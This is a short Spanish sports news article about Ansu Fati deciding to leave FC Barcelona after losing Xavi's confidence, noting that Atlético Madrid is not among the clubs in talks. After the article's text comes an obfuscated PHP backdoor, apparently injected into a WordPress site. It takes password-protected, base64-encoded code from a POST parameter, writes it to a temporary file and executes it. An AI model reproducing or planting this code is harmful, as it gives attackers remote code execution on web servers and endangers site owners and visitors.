Ansu Fati decide salir del Barça

El delantero y joya de La Masia considera ahora que lo mejor es dejar el club blaugrana. Su entorno ya baraja varias ofertas: el Atlético no es una opción.

Hace varias semanas que Xavi le dejó claro a Ansu Fati que lo mejor que podía hacer era salir del Barcelona. El delantero en ese momento le transmitió su deseo de continuar y tratar de ganarse un puesto. Sin embargo, la pretemporada y el primer partido de Liga han hecho que Ansu cambie de opinión y busque una salida.

El internacional español confiaba en convencer a Xavi de que podría ganarse un puesto en el once y ser pieza clave del equipo, pero ya le ha quedado patente que eso no va a ocurrir. El técnico no confía en él y, de hecho, ha reclamado al club la llegada de más efectivos para el ataque, lo que supondría una mayor competencia para Ansu. El más claro ejemplo fue el encuentro de la primera jornada de Liga ante el Getafe: entró primero Abde en el descanso, después Lamine Yamal y en la tercera ventana el propio Ansu.

Ante este negativo escenario, Ansu ha dado órdenes a su entorno de que le busquen equipo. En estos momentos, hay interés de varios grandes de Europa, entre otros clubes, y la fórmula de la operación dependerá de las ofertas que lleguen.

Uno de los clubes con los que se ha relacionado en las últimas horas es el Atlético, pero, según ha podido saber AS, el club rojiblanco no le ha transmitido el interés en ficharlo. De hecho, el Atlético no está entre la lista de clubes con los que en estos momentos se mantienen contactos para su salida del Barcelona.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}